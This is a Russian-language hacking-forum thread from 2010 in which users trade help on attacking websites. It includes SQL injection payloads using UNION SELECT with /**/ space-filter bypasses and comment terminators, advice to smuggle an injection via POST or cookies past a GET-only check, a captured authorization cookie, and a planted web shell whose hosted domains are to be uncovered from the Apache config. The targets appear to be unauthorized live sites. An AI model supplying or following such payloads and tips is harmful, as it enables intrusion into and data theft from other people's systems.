Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Burderator

    Burderator New Member

    Joined:
    7 Jul 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    sql инъекци%D 1Џ РІ лимите криво выводиться запрос на поиск =/
     
  2. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,594
    Likes Received:
    1,242
    Reputations:
    273
    млядь sql инъекция в лимите .... сложно понять и в гугл вбить?
     
  3. Burderator

    Burderator New Member

    Joined:
    7 Jul 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Да искал,до гугла сюда бы не написал
     
  4. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    285
    Likes Received:
    48
    Reputations:
    29

    Отписал тебе в приват.
     
  5. roddik

    roddik Member

    Joined:
    14 Jan 2009
    Messages:
    120
    Likes Received:
    13
    Reputations:
    0
    Привет. Есть уязвимость формата http://domain/'sp%20ace
    Ответ:
    Code:
    Database error: Invalid SQL: select * from elementpath where path='/'sp%20ace'
    MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sp%20ace'' at line 1)
    Session halted.
    Проблема в том, что %20, + не преобразовываются обратно в пробелы. Можно ли такое обойти? Спасибо
     
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,709
    Likes Received:
    405
    Reputations:
    196
    заюзай /**/
     
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,594
    Likes Received:
    1,242
    Reputations:
    273
    тебе в другой раздел, тут вопросы по уязвимостям, а тебе в раздел "О работе"..предлагай цену и может кто и откликнется..
     
  8. Ottiko

    Ottiko New Member

    Joined:
    14 Sep 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Через софт поимал вроде куки авторизации пользователя (может админ :rolleyes: )

    Это что нибудь даст, или мелочь?

    Ещё чита тему Xss для новичков только не очень разобрался...
     
    #14348 Ottiko, 3 Aug 2010
    Last edited: 3 Aug 2010
  9. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,671
    Likes Received:
    1,269
    Reputations:
    1,557
    Это ничего не даст.
     
  10. Ottiko

    Ottiko New Member

    Joined:
    14 Sep 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Так вроде сканер нашол XSS уязвимость...

    Или я путаю... :(
     
    #14350 Ottiko, 3 Aug 2010
    Last edited: 3 Aug 2010
  11. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,671
    Likes Received:
    1,269
    Reputations:
    1,557
    Я про куки. Эти куки ничего не дадут.
     
  12. InfectedM

    InfectedM Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    186
    Likes Received:
    12
    Reputations:
    0
    есть шелл на нем лежит несколько сайтов, но папки с сайтами в виде логинов без домена...

    Есть какой-нибудь простой способ спалить домены?
     
  13. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    285
    Likes Received:
    48
    Reputations:
    29

    Конфиг апача.
     
  14. roddik

    roddik Member

    Joined:
    14 Jan 2009
    Messages:
    120
    Likes Received:
    13
    Reputations:
    0
    Спасибо за идею, я правильно понял?
    Code:
    http://domain/'/**/union/**/select/**/1,2,3#comment
    выводит
    Code:
    Database error: Invalid SQL: select * from elementpath where path='/'/**/union/**/select/**/1,2,3'
    MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)
    Session halted.
     
  15. XENON4IK

    XENON4IK Elder - Старейшина

    Joined:
    22 Apr 2007
    Messages:
    137
    Likes Received:
    61
    Reputations:
    15
    Помогите с анализом кода. в нём есть скуля? если есть как её заюзать?
    PHP:
    <?php
    if (preg_match('/^\d{3}$/',$_GET["id"]))
    {
        
    $link mysql_connect()
            or die(
    "not connect: ".mysql_error());
        
    mysql_select_db("db1")
            or die(
    "not select database: ".mysql_error());
        
    $sq="select name from user where id ='$id'";
        
    $q=mysql_query($sq);
        if((
    $e=mysql_error())<>'')
        {
            echo 
    "error sql";
            
    Header("Location:client.php");
        }
        if (
    mysql_num_rows($q) == )     Header("Location:client.php?e=1");
        else
        {    
            while(
    $r=mysql_fetch_row($q))
            {    
                print 
    "Здраствуйте уважаемый(ая), ";        
                
    $i 0;        
                while ((
    mysql_num_fields($q) - $i) != 0)
                {
                    echo 
    "$r[$i]<br>";
                    
    $i += 1;
                }
            }
        }
        
    mysql_close($link);
    }
    else     
    {
        
    Header("Location:error.php");
    }
        
    ?>
     
  16. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    482
    Likes Received:
    190
    Reputations:
    221
    больше нет чем да, я просто хз есть ли баги в самой функции preg_match, но их вроде нет
     
    #14356 Seravin, 4 Aug 2010
    Last edited: 4 Aug 2010
  17. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    285
    Likes Received:
    48
    Reputations:
    29

    #comment - это ты так коментишь прям в браузере?

    Если да, то попробуй так /*

    Ещё стоит мне кажется что нибудь перед UNION написать типа
    domain/test'/**/union ....
     
  18. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    329
    Likes Received:
    72
    Reputations:
    12
    roddik, попробуй http://domain/'/**/union/**/select/**/1,2,3/*
    т.е. в конце комментарий повешай

    XENON4IK, т.к. в строчке $sq="select name from user where id ='$id'"; запрашивается просто $id то в строке адреса укажи нормальный id(например 321), а в POST запросе посылай инъекцию, или в COOKIE т.к. и пост и куки перебивают массив GET, а проверка идет только на ГЕТ.


    Seravin, где ты вообще preg_replace увидел?
     
    1 person likes this.
  19. tompson_

    tompson_ New Member

    Joined:
    1 Jul 2009
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    есть скуля вида

    последняя кавычка учитывается в запросе в любом случае и вариант
    [inj] = ' union select 1,2,3--
    не прокатывает. не только --, но и /* /**/ ; никакие комментарии не работают. в итоге если
    [inj] = 'order by 1--
    выводит
    я подобрал количество столбцов запросом, где
    [inj] = '+union+select+1,2,3,'
    получилось

    но в скрипте идет следующий запрос, который выдает ошибку

    можно ли обойти UPDATE и как это сделать?
     
  20. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    273
    Likes Received:
    139
    Reputations:
    87
    Линк на скулю дай.
     
Loading...
Thread Status:
Not open for further replies.